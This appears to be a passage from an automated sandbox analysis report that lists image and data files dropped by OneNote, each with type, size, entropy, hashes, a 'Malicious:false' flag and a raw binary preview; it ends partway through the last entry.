                                                                                                                                                                                                              Preview:2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ............:......w.......:......w........I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............w.......#O_...[]....N...^.................!..D..B...@........f........................................I.qk..B.....LZ............w.......#O_...[]........w.......#O_...[]........................................................................j.......T.]..............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...+..7+..7........................;........4...4...4........................#...............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 39 x 600, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2104
                                                                                                                                                                                                              Entropy (8bit):7.252780160030615
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:2PPEOtz2P/LJtVRaqBG8qFOPvHlcEXgkuwf+j:2PZFSjJDjqFOPPlXgG+j
                                                                                                                                                                                                              MD5:F6C596F505504044DF1E36BA5DA3F09B
                                                                                                                                                                                                              SHA1:BCF17EC408899B822492B47E307DE638CC792447
                                                                                                                                                                                                              SHA-256:EDBB86F160050FBF1F9860276802BAE292DBFD0BC98E3EA90D43D981E9F0C54A
                                                                                                                                                                                                              SHA-512:E8D067A1932CED8746FE7D665EEC34EA92A98AFF3DF26FFA9DD02742DDEA3C5654124A88A649FA33DB596F96A5FC9CB2C693D03132F1C8B254ACB56DB4763BD8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR...'...X.......:....PLTE.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................{.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^..c.%i.F...m.m.f.m.m.m{&....X...9.....M.WUW.d.N.O...E$...$...)H....n....N.k..v.....v1L[w)w.}..!...Y.X.V.D.......[....;..[..;....
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.379215742086249
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:6sDcFWbM6Ztt55dZVE2JlZuUAXgdBA9pshpyZrdMrHHpfp6FXR0DNYg:6slo6ZtzE24Xp9poURM5p6oY
                                                                                                                                                                                                              MD5:B3455F6D41707E0C2C409B9FA414B975
                                                                                                                                                                                                              SHA1:A178AE38D8FB812E9ACAEE39BE6C173702AF8410
                                                                                                                                                                                                              SHA-256:531062E31F55767A2291E49EE053A53B04E5ABBCEEF829C670C0876DCB31D1DC
                                                                                                                                                                                                              SHA-512:30DDB5AA3E15BC28CE71B55E3F1402EAFB30F3CAD27E6FEADB4F6DE02FD3960C8C37D65B3868DE2F473AFA42EF39E0C45B5246067AB3C24EA7D882CEFC5ED9C0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......T...v...H...................................................................................................................................2...>...0.......v...|............................I.......I.qk..B.....LZ................ ..(.r........ ..(.r.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............Z+!9.L..D.hX6......N...^.................b._.C.4G.E3.J........f........................................I.qk..B.....LZ.............Z+!9.L..D.hX6...........Z+!9.L..D.hX6..........................................................................j.......T.]..............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4........................#...............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):14177
                                                                                                                                                                                                              Entropy (8bit):5.705782002886174
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:EbgGcV/hlvpfal7rgYa8S7auAxwfuSTmCSNoFQ6NO7L:EbgGcVnpwimnd38FdQL
                                                                                                                                                                                                              MD5:7CDCE7EEBF795998DA6CAC11D363291C
                                                                                                                                                                                                              SHA1:183B4CC25B50A80D3EC7CCE4BF445BCFBAA6F224
                                                                                                                                                                                                              SHA-256:DE35AF949D4F83E97EE22F817AFE2531CC4B59FF9EE6026DCA7ECEBC5CF2737F
                                                                                                                                                                                                              SHA-512:560FB15A9C12758D11BB40B742A6EAD755F15AD10D6C5DEBA67F7BC8A2AE67C860831914CBCBCDED9E6B2D1D5F26A636B9BCEF178151F70B4D027316F94F27E1
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!.1..A....Qa".q..2.....&...B%6.'..R#3.$E.r457bS.DUFV.Wg(.......................1...3.Q..2Rr....s.4.!Aq.S.aC5B$%............?...n.Liq.}.{#....3/gg.1.M +..~3...q..+=..:.g.i1;P)7.....q..n.s"p...wx........v.t.f;..L/..~....y.r[.r.....n.n3..6i..g..}../........3..x.L.i?We..l.......~..<.;..6..o.....N.t.o6.l..~.......<...m.V...Q.7k.u./wq.t..;.I...}..{...>.L..3m..a....yd......6~.f..~Y..}+..<.[w..'-..?.v.7...v.u..4.......1];..u.MO.......s..p..ms.'.O-o...O......m.k.e....)t....i>..E|....,iOyD|.{......g.n...cu....=..........h.\.Q:?g/?.I.3._...t...d.n.0.%y....S.Q....S.&K.w..&wY<....%.g.v.....$y..#,i;.=...t...I6..yO..o.d..w\k...~......)..rK.......].u....N....e.s..kU.u..'}
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.354431856020487
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:Ish15iTztpVtaZpEYXL7OMCX1Ct/9lsdpyY4rdMrnhNrWFX109cdsV:IspiTRpV4vEQAX1m9lY74RM/Wls
                                                                                                                                                                                                              MD5:8D0F5F4337A31C6283DA5A5B2993370F
                                                                                                                                                                                                              SHA1:EA23D1C7706FC9123710DB1F096A08A1B8EC1A0E
                                                                                                                                                                                                              SHA-256:52E45F23E66D5AF52CBC0E4D04C86E0680A11EB04F2AEE8E6EC784DF99056B74
                                                                                                                                                                                                              SHA-512:746936E7E9EEAD7A84D9B3B7A540672C5F943A94D99B258DA83645A932EE09DFB04AD84F72CDBAFFEFA3D52B887322932AE46CEBE9E44685B3C108AEE548A39E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ..+.......+.8hQ.5........+.8hQ.5........+..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............^..I6...Z..T.h....N...^....................1O.^!...........f........................................I.qk..B.....LZ..............^..I6...Z..T.h..........^..I6...Z..T.h...........+.......+.......+...........................................+j......+T.]....+.......+..B....+H......+..B....+..>.)..+..J...................;........4...4...4.."................+...+...+..z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4...........+.......+....#..+............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:44:07], progressive, precision 8, 611x163, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):36740
                                                                                                                                                                                                              Entropy (8bit):7.48266872907324
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:3nwDxjTvoE0Rjwit4rjucDILWg7/Da0JgGQ8e1S8SA/Khos0:SxjTmZw7nucDILj77a0JgGQvScb
                                                                                                                                                                                                              MD5:9C205C8D770516C5AA70D31B2CA00AF3
                                                                                                                                                                                                              SHA1:9A1002F0CF7F92F1BE2BB25BAD61CEBFAC282482
                                                                                                                                                                                                              SHA-256:E111F96490755C7D71E87C88ACAEA38AFE55BB865B1A14A83C5BD239648D5E2C
                                                                                                                                                                                                              SHA-512:A3E105208B32831265428572B0937DD3C17B793D8611B2DA8D4939F1BEC6050999D375E3F6B87D53AD49DFA0EAE737B0141D37597AA42116C310761973D4A134
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:44:07............................c.........................................................(.....................&...........n.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d................................................................................................................................................."...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..o...4.gP.~.c...K{...V.=...].<.........vS.........s....(.t......X......kk7....~-...yF}^c.Z.\.G./.?t...>....:.>......./.ib..).
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.48706931607948
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:9s0NORuwtMlEL1XD9ZyxkRMr66uFRKrtW8Adurb74:9s0NORuwt5L1XD9ZyxkRMr66uFRKrtWT
                                                                                                                                                                                                              MD5:A7041CEAFD29833B9687019CB4DEAEB8
                                                                                                                                                                                                              SHA1:A1E3141C73055620C0D7610CC518720BFCC5467F
                                                                                                                                                                                                              SHA-256:03F468C9C40ABB54E990B495949BCEC172E4C1FF61470204F0B01D97A101CF05
                                                                                                                                                                                                              SHA-512:4C9C0BAD0FABCFD01E2B04ECEA5327092C10DE7E73EBDF087701449BB9504F8658AE023FC8508216C0611721045E6333B4E734BC51495E7DB03CCFB6B27D6F99
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......l...v...`...................................................................................................................................2...>...H.......v................................I.......I.qk..B.....LZ..q.......qb.a.0..Q.....qb.a.0..Q.....q..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.................d.X...Q..j......N...^................Z...bl@.s...Y........f........................................I.qk..B.....LZ................d.X...Q..j..............d.X...Q..j.............q.......q.......q...........................................qj......qT.]....q.......q..B....qH......q..B....q..>.)..q..J...................;........4...4...4.."................q...q...q..z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4...........q.......q....#..q............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):53259
                                                                                                                                                                                                              Entropy (8bit):7.651662052139301
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:dCiCBBenRYWDBCipMYGTbYGLHbXxoP/qEF+MU50qyJ30h2W474S/Aq/xc4674bi5:dCiIQXBCiwbDLHD0/sFyVel4Pi4UgE
                                                                                                                                                                                                              MD5:2EE369ABB7936F8C28FF0ABDD224EA05
                                                                                                                                                                                                              SHA1:FE9D304A7B49E31EAE439369ABC548E265149636
                                                                                                                                                                                                              SHA-256:FB12D59B8BE911247BBAFDD416852E8B74B028005A141CB4DBBBA109B4B6ED2C
                                                                                                                                                                                                              SHA-512:5CF396CA472C32AE988600176114106CB1619404DD899A3867A5AB43DC90583B771EF69B14EF50E56A21F038BF51D8463C6ADD2DE9D4CB523F6290E24A4DECB3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..AQa....q........"2..R..Bbr..#S....3$.....C.4v..(X.DtEUV.....cs..Td.5uf'Wgw8Hh........................!1Q.Aa....q.2...."R...r..3.t..U...B#S.4ub..C$d.5Ee&'7c.D%sT..............?.....?...k,lk^...M".Yo5.Qp.&s}b.m.:...W.x}.*.a......N1..d-n.-..^..b..TZ.W..."....F....^......ve5...^...2.:i...........~u2pK.z./&..u..L[I....Y....@y{|>..MN=:....Q[..H....a........|%..4fV....).....^.9b.f...F...p.=.W...aZ.........Z.t.n.....z3..[..lVh..\.N-.._.sK.y.._e.G.jig.a.7^....u...*.p.5.a.].........u/u..D.yl.XA..f.z..~.x.....N.....b=.uv.2.t.'.N.-.H..n.v.a.A[.Z.....T2...._...:....h..l.E..sm..a.3I...RE...fWb.Ek.0.#.)..Y#T...........u{....U....s.].7_H.2.`O6...P......}..4LR....]4.mid...
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.322757117631226
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:2sYMfdnJDAptIoOEXDJMGXnt9psopyprdMr8E7FX+g6DK+p0P6pbl3:2s7DAp2TEXZXt9pxERMJmr
                                                                                                                                                                                                              MD5:150A5E348691D24B59FA51FF07EA4702
                                                                                                                                                                                                              SHA1:F9E7FD7159FD1F24260DB99F9AA40E6BA01F09C8
                                                                                                                                                                                                              SHA-256:B4981F777507813CC526A37610C8D58B267F4494C225CADB6A32481122AE4792
                                                                                                                                                                                                              SHA-512:2FE9DB1F84F22D15D52D906BC9E5ED076B7DB21CA7397AF30AE452A49B626D9685EFC3CBB71662EBA6C09984DDC9FF8AEA7BE36B8412B03D963F955BAEAC9DF9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZf+7.....f+7.m.../:m Fx..f+7.m.../:m Fx..f+7..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............J..?U..5...!6.;....N...^.................T....O.*q.X.a.........f........................................I.qk..B.....LZ............J..?U..5...!6.;........J..?U..5...!6.;.........f+7.....f+7.....f+7.........................................f+7j....f+7T.]..f+7.....f+7..B..f+7H....f+7..B..f+7..>.)f+7..J...................;........4...4...4.."..............f+7.f+7.f+7..z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4.........f+7.....f+7....#f+7............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):60924
                                                                                                                                                                                                              Entropy (8bit):7.758472758205366
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:kU7O7+CFqO6DkxTgPzo2wqggrrX8QvN1I/ZLBttB9+dPFXbc:hVuqJDaTqo2wq1L84N1I/Z1tT9X
                                                                                                                                                                                                              MD5:D58C51D2CF586A5E14A9EC8529C3B0A8
                                                                                                                                                                                                              SHA1:F4811A353797C29B1E3F5A61B125C46E1534D587
                                                                                                                                                                                                              SHA-256:F927C7825851974A2149868146970706523A49165133CEE6027A43E8C9ABDF27
                                                                                                                                                                                                              SHA-512:34B963173AFBDF07432F4B983D29F10376E4771FE666E9D50B1A81DA0B9F6001FD86B4A08B9711386DE153BF6E03C8E932E2D181C8EAF94EFF34D20FCA7570E0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d................................................................................................!1AQ.aq....".....2B...Rbr#.s.4...3$.5u.6v..CSc...DT..f..t..&F........................!1..A.Qaq....."2....B.s....Rbr..#4...35...CSc.$...DTdt..%..............?....O<......X.O.Fg..{.W&u.u.T~.|r;g!.._X..N.p.4.........................................................yK..xd...6..|%....\j..e.=...Y..f..I.|-....e...$R.j.......~.W#....{.....V.k.|F..z^..:.~..f......"x.....L..K..r../.;..[..l...;.U...W...X.........8.....y?..B...m.......j..Q.g3..G.K....GL.o..n7a..Y..[.'.........x........\......~...f...0\Wc.n?k.|.....1.ww;..2..?...r4uF.MXdB6..W..mG2NJ.E........u...2.q...Z..=(l)jU.X...U.\X.......O<......X.O.Fg..{.W&u.u.T~.|r;g!.._X..N.p.4.......................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.3244272524242495
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:8s2fd7ipav9XtuWhEJtZkXA9ZsEpyJrdMrUEtFXihO9GiFveNv+1:8s2tipq9XDEaXA9ZFMRMUsGiFWNv+
                                                                                                                                                                                                              MD5:245A3A36442B4CDF7760E2A60FB39932
                                                                                                                                                                                                              SHA1:185544E2733C02DE99116D632DE42FFD4E37C315
                                                                                                                                                                                                              SHA-256:E5B8C8C59712031317EC5E7B3BDE7657BC141C64BADC9A9F58FE5BD23F187235
                                                                                                                                                                                                              SHA-512:84C92825302D914AB0442DD449808E6B37FE95671B0F6273A1CE0E05956EB4BFCAA52A594014A49CCAF3FF9B77DCFCB549AAB14A0F374B637ACD08A43ADA814A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ..Y.......Yj..g.:Wy/.(....Yj..g.:Wy/.(....Y..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..................|..-..<ClI.....N...^.................5..$NH.......^........f........................................I.qk..B.....LZ.................|..-..<ClI..............|..-..<ClI............Y.......Y.......Y...........................................Yj......YT.]....Y.......Y..B....YH......Y..B....Y..>.)..Y..J...................;........4...4...4.."................Y...Y...Y..z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4...........Y.......Y....#..Y............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 39 x 579, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):515
                                                                                                                                                                                                              Entropy (8bit):6.740133870626016
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:6v/7su2/c30mqkg9VgFHe7Ll8UmJX/N+1Zmkk8f3lbtI4:4mc38gFHe18lkk8f3lbth
                                                                                                                                                                                                              MD5:E96BE30D892A5412CF262FEE652921CA
                                                                                                                                                                                                              SHA1:8190A0BFE21D04BC6F3A406E91B87CA69C03A2DE
                                                                                                                                                                                                              SHA-256:0E31DA4DFCFF4A36C64C1CE940362D2309769F36369E4C43C317D5F2FA15658E
                                                                                                                                                                                                              SHA-512:D647F51ABBD013226A6ADD0D551D058C633F867F9AF5A9E099B85D6E291D220F7B85958B07381CD4C7C4F72356DBAFE2A86932AE398E28C56CDDF0744E92EE24
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR...'...C........b...`PLTE..................................................................................................bKGD....H....cmPPJCmp0712....H.s....9IDATx^..I..@.C..<..?mo.#C((.J}...~..B...b.I.i.\<.e.....(p.I.EO...q.x.......dRz....K..b0.:.<c.o..0.x\:...F....I&..ap....."P@....DO...q)p*..@Y.CL2)=......1.........4....._.G..^`..lDO...q...X....SL..z....K..#.L#..I6..ap.Ls.,....7&..ap.p..lI...,GO...q.....k.n1..4......3=.f.x.$..4.....o....x.$+..0.x\.,&6...............IEND.B`.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.342391086821856
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:usxZwdcMtZ6k6xEPA8SpXp9RsspyxrdMrdZdFXK8xAejJYg:uswcMGTEP+Xp9R98RMXdflY
                                                                                                                                                                                                              MD5:3C4CE3C9A5BCDBD81C3E727ED57D7882
                                                                                                                                                                                                              SHA1:A3B202FD92EEEEFCE14D63CB157FA183F4E7F97E
                                                                                                                                                                                                              SHA-256:FDBF539D8557F16B31A71737F082CFAECCA8DC97C1275EBFB77822EB478FA99E
                                                                                                                                                                                                              SHA-512:BAE1BB67BBCC128844BAD95DF81EDFFBB719A9AE20F5A2FB98CEBC18EC412891CA94BA9F0C2C2FB7CF852BFEAE8755BCDF4B138FB45C07A3A079675CC681EFA6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......T...v...H...................................................................................................................................2...>...0.......v...|............................I.......I.qk..B.....LZ.G.......G.T....%.tn.n...G.T....%.tn.n...G...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............\...Ff3.2?w'.y].....N...^................|..p.H...{.'.........f........................................I.qk..B.....LZ............\...Ff3.2?w'.y].........\...Ff3.2?w'.y]...........G.......G.......G...........................................G.j.....G.T.]...G.......G...B...G.H.....G...B...G...>.).G...J...................;........4...4...4.."...............G...G...G...z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4..........G.......G.....#.G.............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 30 x 700, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1547
                                                                                                                                                                                                              Entropy (8bit):6.4194805172468286
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:dZeDNYbS+238CTUFPA6SXG5qSacX9q73eXu0vC3dU+OB2gbwHRuZ:dykp9FzBBacXQ3uNC3n7xuZ
                                                                                                                                                                                                              MD5:0BA36A74DFBF411FAB348404CCEC3348
                                                                                                                                                                                                              SHA1:4C619790E517416E178161028987DF1CD3B871CC
                                                                                                                                                                                                              SHA-256:2E7AAF26BEC32148B96442E8FFF1BD2CEF2D72630969F23B9A2ABEDB6CFEC93B
                                                                                                                                                                                                              SHA-512:90AF53DB7C413E2ADB970AC345F73E4ED8AF626E179C929E6560118F7A9E98DC7C5FF02B2B3F6C98D397E0FE2D85F3427C6928C328872149E176FA8A99E91F54
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR...............\....PLTE.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................D......bKGD....H....cmPPJCmp0712....H.s.....IDATx^.WSTA........b.0gPPP0..E.9b@L(.c.N.U>..@......;...}..B.(....$......5..XS...I....).!....D^.uE...\..5........F."o..-...m.n. .^.....q= .
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.343100343997047
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:sobSsYnLDecHt7TNhE05Ij6XU2f9d3UTpyNrdMrDUeUFX00pgpsZ:sobSsYD5HhEUXUC9dkTARMCqPs
                                                                                                                                                                                                              MD5:E774F3CAF68E41FE41E0CAB9307F3248
                                                                                                                                                                                                              SHA1:36CA53DF89B95775A4CADEABCDEAD8F75156F508
                                                                                                                                                                                                              SHA-256:D800C8A574EFB9F9A0A8E51435B00917679EA63F86425F2FDF045E05BAA617EF
                                                                                                                                                                                                              SHA-512:3254DD1CA497EA6F19EE9C98D127B800013D9850A00F809A6E00B5812712CE5D9467BE327FD4C30183904883177C0BB4DC19145565B1A52B57388FDD00AF6363
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ...........}.n.......Q...}.n.......Q.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.................^]...@[........N...^................7r&...@.-.:..X........f........................................I.qk..B.....LZ................^]...@[................^]...@[............................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4........................#...............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):95763
                                                                                                                                                                                                              Entropy (8bit):7.931689087616878
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:EoES7mhTyzabUaE77xAOmq0zVruQlttNxlipxVWssMU2YhRy2v6pKKYhQzwMc2:zz7mhTyzabUa4b4xuQlttnlGx8x9h02M
                                                                                                                                                                                                              MD5:177DD42CA99CAA2CCBF2974221680334
                                                                                                                                                                                                              SHA1:35FD86B3DD082A6D4930C67BC0E05D3B5817465A
                                                                                                                                                                                                              SHA-256:525A857D0EDA855A64D3619DF58B1C2D013A73E60FA0D49B155ECFCB2C134C7C
                                                                                                                                                                                                              SHA-512:6FB6D9A6C97B1115C3246690A2F339CD612899AC25ACBA00296EAEAA0A1D094E7339D670969764FE23EB7C08FCDD01C6F78FBC0735D504D5E02AD342901719B3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!..1AQa...q......."...2..B#Rb3..r$...6..C4....Ss%5...tu.c..Dd.EU7....................!.1.AQ..aq......"r..2...4Rb#3$B.Ss............?..H..dV....U..-..0]Cp.%O.Z.Y.e.=/.q.....j76.w@s...5.&&&5...n..w..>.1....;.vR..[.......=.......KtY]u3.g18...).r....&.IZ'.....g..4kY..X..b.......y<...r1........e.._...X...w....op.m%Jr31...S.Vo.._....OI\]....F..V-....\...2j..X.....y.p.$4.....&#..]..n.V..x..P...F..C.f....])..~..Z\.....,..#..v..v...2V.k.SuaydO../[.*c._..oTV<Z.s.[...o.x..>....-....v...#....-.X..L.Z./#.XG.-.0......%w..H.@aZ....C.}...N~.;..R......5.D......I.... .R........s.>..ks....(...S...9....2=. :^.. p.+?(....$..Q..I.........=|..`2. v..t......U*.8.u.. ...'...*...2;u....& 3..$.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.284878488747358
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:isZaNy0BkZtk4oEyLgLHXv9lUspy1rdMr/M33BFXo9Gxl8d:isZkBkZiFEy07Xv92sYRM0Bvl8
                                                                                                                                                                                                              MD5:B34E185947B9C2977681B56AEA96FCDA
                                                                                                                                                                                                              SHA1:E29F3C630358962069A394E4EA4193A060C8AF22
                                                                                                                                                                                                              SHA-256:FD26FC992FF022AA601594B792CC00233671D86E0DA300340B5CC7F4A7FB4F15
                                                                                                                                                                                                              SHA-512:DC46EAD6F19E519B8C01D854CBCDA4BD4FC95E368ED637A4D7919F03AEEC6255F39D6540F48A3CD6917B2342678741F5B9FA893E0B3FCB01EDD8406D650D32F9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZj.......j..A.....K.^..?.j..A.....K.^..?.j....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'....................5...x.T.....N...^...................@6AH.q. ...........f........................................I.qk..B.....LZ...................5...x.T................5...x.T..........j.......j.......j...........................................j..j....j..T.]..j.......j....B..j..H....j....B..j....>.)j....J...................;........4...4...4.."..............j...j...j....z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4.........j.......j......#j..............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):67991
                                                                                                                                                                                                              Entropy (8bit):7.870481231782746
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:3PC0XJjsmsKuZRG1pXuZ6z3wARnV9AEnieCc7cllJcHJ:qyMBzkUZ0gq25c7Z
                                                                                                                                                                                                              MD5:1271B1905D18A40D79A5B9DB27EE97EA
                                                                                                                                                                                                              SHA1:9618608FBD7342DE6C71220A36C3F4995BA9C13E
